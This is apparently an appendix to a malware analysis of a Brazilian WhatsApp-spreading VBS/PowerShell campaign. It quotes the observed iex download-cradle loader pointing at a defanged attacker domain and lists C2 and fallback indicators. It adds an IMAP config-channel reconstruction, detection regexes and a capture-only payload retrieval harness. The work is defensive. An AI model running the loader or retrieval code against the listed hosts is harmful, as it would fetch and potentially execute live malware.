
WhatsApp_VBS_PowerShell

October 13, 2025


Appendix B — PowerShell Snippets (Defanged)

Observed Malicious Loader Command (Do NOT Execute)
----------------------------------------------------------------
powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://miportuarios[.]com/sisti/api.ps1'))"

IMAP Bootstrap (Mailbox as Config Channel)
----------------------------------------------------------------
# Opens TLS IMAP to imap.terra.com.br:993, logs in, searches for subject "data", and fetches the body of the latest hit.
# Described here for analysis context only; do NOT run in production.
# (The original script uses TcpClient + SslStream and raw IMAP commands: LOGIN/SELECT/SEARCH/FETCH.)
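The following is an added, capture-only reconstruction of that mailbox-as-config-channel step, written for this appendix rather than taken from the sample: it speaks the same raw IMAP sequence (LOGIN/SELECT/SEARCH/FETCH over TcpClient + SslStream), picks the newest message whose subject matches, and writes the body to disk without evaluating it. The host, credentials, mailbox and output path are assumptions for a lab IMAP server you control; nothing here should be aimed at the live mailbox.

```powershell
# Added example (not the sample's own code): capture-only reconstruction of the
# mailbox-as-config-channel step. Host, credentials, mailbox and output path are
# assumptions for a lab IMAP server you control; do not aim it at the live mailbox.
$ErrorActionPreference = 'Stop'
$ImapHost = 'imap.lab.example'        # assumed lab IMAP server
$ImapPort = 993
$User     = 'analyst@lab.example'     # assumed lab mailbox
$Pass     = 'lab-password'            # assumed lab credential
$Subject  = 'data'                    # subject string the loader searches for
$OutFile  = 'C:\Temp\imap_body.txt'   # fetched body goes to disk, never to IEX

$tcp = New-Object System.Net.Sockets.TcpClient($ImapHost, $ImapPort)
$ssl = New-Object System.Net.Security.SslStream($tcp.GetStream(), $false)
$ssl.AuthenticateAsClient($ImapHost)  # server certificate validated by the default callback
# Latin-1 keeps one char per octet, so IMAP literal sizes map directly onto Read() counts.
$enc    = [Text.Encoding]::GetEncoding('iso-8859-1')
$reader = New-Object System.IO.StreamReader($ssl, $enc)
$writer = New-Object System.IO.StreamWriter($ssl, $enc)
$writer.NewLine = "`r`n"; $writer.AutoFlush = $true
$tagCounter = 0

# Reads exactly $Count octets of a {n} literal from the stream.
function Read-Literal([int]$Count) {
    $buf = New-Object 'char[]' $Count; $got = 0
    while ($got -lt $Count) {
        $n = $reader.Read($buf, $got, $Count - $got)
        if ($n -le 0) { throw 'connection closed inside literal' }
        $got += $n
    }
    return (-join $buf)
}

# Sends one tagged command and returns every response line (a literal is inlined as
# one element) up to the tagged completion line; throws on NO/BAD.
function Send-Imap([string]$Command) {
    $script:tagCounter++
    $tag = 'a{0:D3}' -f $script:tagCounter
    $writer.WriteLine("$tag $Command")
    $lines = @()
    while ($null -ne ($line = $reader.ReadLine())) {
        $lines += $line
        if ($line -match '\{(\d+)\}$') { $lines += Read-Literal ([int]$Matches[1]) }
        if ($line.StartsWith("$tag ")) { break }
    }
    if ($lines[-1] -notmatch "^$tag OK") { throw "IMAP '$Command' failed: $($lines[-1])" }
    return $lines
}

$null = $reader.ReadLine()                                   # "* OK ..." greeting
Send-Imap ('LOGIN "{0}" "{1}"' -f $User, $Pass) | Out-Null
Send-Imap 'SELECT INBOX' | Out-Null

# "* SEARCH 4 17 23": the loader takes the highest sequence number, i.e. the newest message.
$ids = @(Send-Imap ('SEARCH SUBJECT "{0}"' -f $Subject) |
        Where-Object { $_ -like '* SEARCH*' } |
        ForEach-Object { ($_ -replace '^\* SEARCH', '').Trim() -split '\s+' } |
        Where-Object { $_ -match '^\d+$' } | ForEach-Object { [int]$_ })
if ($ids.Count -eq 0) { throw "no message with subject '$Subject'" }
$newest = ($ids | Sort-Object)[-1]

# "* 23 FETCH (BODY[TEXT] {1234}" is followed by the literal, then ")" and the tagged OK.
$fetch = @(Send-Imap "FETCH $newest BODY[TEXT]")
$i = 0
while ($i -lt $fetch.Count -and $fetch[$i] -notmatch '^\* \d+ FETCH .*\{\d+\}$') { $i++ }
if ($i + 1 -ge $fetch.Count) { throw 'FETCH response carried no body literal' }
$body = $fetch[$i + 1]
Send-Imap 'LOGOUT' | Out-Null
$ssl.Dispose(); $tcp.Close()

[IO.File]::WriteAllText($OutFile, $body, $enc)   # capture only; nothing is evaluated
Get-FileHash $OutFile -Algorithm SHA256
```

Reading the literal by octet count rather than line by line is what makes the capture faithful: a body that contains bare CR or LF, or that does not end in CRLF, would otherwise be merged with the closing ")" and silently corrupt the hash you record.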

Related Backend Endpoints (Same Infrastructure)
----------------------------------------------------------------
miportuarios[.]com/sisti/api.php
miportuarios[.]com/sisti/log.php
miportuarios[.]com/sisti/config.php
miportuarios[.]com/sisti/contacts.php

WhatsApp Automation Indicators (Related PS sample)
----------------------------------------------------------------
– Downloads WPPConnect JS from: github[.]com/wppconnect-team/wa-js/…/wppconnect-wa.js
– Copies Chrome profile to: C:\temp\ChromeWpp
– Drops ChromeDriver to: C:\temp\chromedriver.exe
– Interacts with: https://web.whatsapp[.]com/
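The following hunting logic is an added example, not code from the analysed sample: it turns the observed loader command line above and the WhatsApp-automation indicators in this list into named checks, then runs them over a handful of constructed process-creation (4688) and Sysmon FileCreate (Event ID 11) records. The indicator strings are the page's own, refanged on the way in so the same list can be pasted straight from a report; the event records, the benign backup script and the user name in the sample path are made up for the demo.

```powershell
# Added example, not code from the analysed sample: hunting logic for the loader
# command line and the WhatsApp-automation artifacts, run over constructed
# process-creation and file-create records. Indicator strings are the page's own,
# refanged before matching so they can be pasted straight from a report.

function ConvertFrom-Defanged([string]$Text) {
    # "[.]" -> "." and "hxxp" -> "http"; real log data is left unchanged
    return (($Text -replace '\[\.\]', '.') -replace '(?i)hxxp(s?)://', 'http$1://')
}

$KnownHosts = @('miportuarios[.]com', 'lefthandsuperstructures[.]com') |
              ForEach-Object { ConvertFrom-Defanged $_ }

# Components of the observed cradle, kept as named checks so a verdict explains itself.
$LoaderChecks = [ordered]@{
    BypassPolicy   = '(?i)-e(xecutionpolicy|xec|p)?\s+bypass'
    InMemoryExec   = '(?i)(\biex\b|invoke-expression)'
    DownloadCradle = '(?i)(net\.webclient|downloadstring|invoke-webrequest|\biwr\b|\birm\b)'
    ForceTls12     = '(?i)securityprotocoltype\]::tls12'
}

function Test-LoaderCommandLine([string]$CommandLine) {
    $cl    = ConvertFrom-Defanged $CommandLine
    $hits  = @($LoaderChecks.Keys | Where-Object { $cl -match $LoaderChecks[$_] })
    $urls  = @([regex]::Matches($cl, '(?i)https?://[^\s''"\)]+') | ForEach-Object { $_.Value })
    $known = @($urls | Where-Object { try { $KnownHosts -contains ([uri]$_).Host } catch { $false } })
    [pscustomobject]@{
        CommandLine = $CommandLine
        Checks      = $hits
        Urls        = $urls
        KnownC2     = $known
        # a download fed straight into IEX is the loader shape whatever the domain;
        # "-ep bypass" on its own is routine in admin scripts and is not flagged by itself
        Suspicious  = (($hits -contains 'InMemoryExec') -and ($hits -contains 'DownloadCradle')) -or ($known.Count -gt 0)
    }
}

$WppArtifacts = [ordered]@{
    ChromeProfileCopy = '(?i)^C:\\temp\\ChromeWpp(\\|$)'
    ChromeDriverDrop  = '(?i)^C:\\temp\\chromedriver\.exe$'
    WaJsDownload      = '(?i)github\.com/wppconnect-team/wa-js/.*wppconnect-wa\.js'
    WhatsAppWeb       = '(?i)^https://web\.whatsapp\.com/'
}
function Find-WhatsAppAutomationArtifact([string]$Value) {
    $v = ConvertFrom-Defanged $Value
    return @($WppArtifacts.Keys | Where-Object { $v -match $WppArtifacts[$_] })
}

# Constructed records: Id 4688 carries a command line, Id 11 (Sysmon FileCreate) a path.
$Events = @(
    [pscustomobject]@{ Id = 4688; Data = 'powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(''https://miportuarios[.]com/sisti/api.ps1''))"' }
    [pscustomobject]@{ Id = 4688; Data = 'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1' }
    [pscustomobject]@{ Id = 11;   Data = 'C:\temp\chromedriver.exe' }
    [pscustomobject]@{ Id = 11;   Data = 'C:\temp\ChromeWpp\Default\Preferences' }
    [pscustomobject]@{ Id = 11;   Data = 'C:\Users\ana\Downloads\report.pdf' }
)
foreach ($e in $Events) {
    if ($e.Id -eq 4688) {
        $r = Test-LoaderCommandLine $e.Data
        '[4688] suspicious={0} checks={1} knownC2={2}' -f $r.Suspicious, ($r.Checks -join ','), ($r.KnownC2 -join ',')
    } else {
        $a = Find-WhatsAppAutomationArtifact $e.Data
        if ($a.Count -gt 0) { '[Sysmon 11] {0} -> {1}' -f $e.Data, ($a -join ',') }
    }
}
```

The verdict deliberately keys on the combination of in-memory execution plus a download cradle, or on a known host, rather than on "-ep bypass" alone: the second constructed record (a scheduled backup launched with -ExecutionPolicy Bypass) trips only that one check and stays unflagged, which keeps the rule usable in an environment where admins routinely bypass the policy.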

Lab-Only, Capture-Only Retrieval Harness (Safe Alternative)
----------------------------------------------------------------
# Purpose: capture bytes without execution; include PT-BR headers and cookie seeding via /data.php.
# URLs are kept defanged here; refang only inside an isolated lab. Replace $out as needed.
# Do NOT include this in automated allowlists.

$ErrorActionPreference = 'Stop'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$h = @{
    'User-Agent'      = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0'
    'Accept'          = '*/*'
    'Accept-Language' = 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7'
}
$s = New-Object Microsoft.PowerShell.Commands.WebRequestSession

# Seed cookie (fallback path from the VBS)
Invoke-WebRequest 'https://lefthandsuperstructures[.]com/data.php' -Headers $h -WebSession $s -UseBasicParsing | Out-Null

# Fetch gated PS1 (no IEX; write to disk)
$out = 'C:\Temp\api.ps1'
$null = New-Item -ItemType Directory -Path (Split-Path $out) -Force   # -OutFile does not create the folder
Invoke-WebRequest 'https://miportuarios[.]com/sisti/api.ps1' `
    -Headers ($h + @{ 'Referer' = 'https://lefthandsuperstructures[.]com/data.php' }) `
    -WebSession $s -UseBasicParsing -MaximumRedirection 10 `
    -OutFile $out -Verbose

Get-Item $out | Select-Object FullName, Length, LastWriteTime
Get-FileHash $out -Algorithm SHA256

Indicator Summary
----------------------------------------------------------------
IMAP: imap.terra.com.br:993
Fallback: lefthandsuperstructures[.]com, clhttradinglimited[.]com, mazdafinancialsevrices[.]com,
ricardasphotography[.]com, jornalistaaurelianoborgesmidia[.]com, cursosgratiss[.]com[.]br,
intelligentopennetworkingawards[.]com, vinhomeshungyentheempires[.]com, wbdiamonds[.]com,
pastebin[.]com/raw/SmCz4cp8
Panel: miportuarios[.]com/sisti/{api.php,config.php,log.php,contacts.php}
Other: api.ipify[.]org, cld[.]pt/dl/…/Orcamento…zip
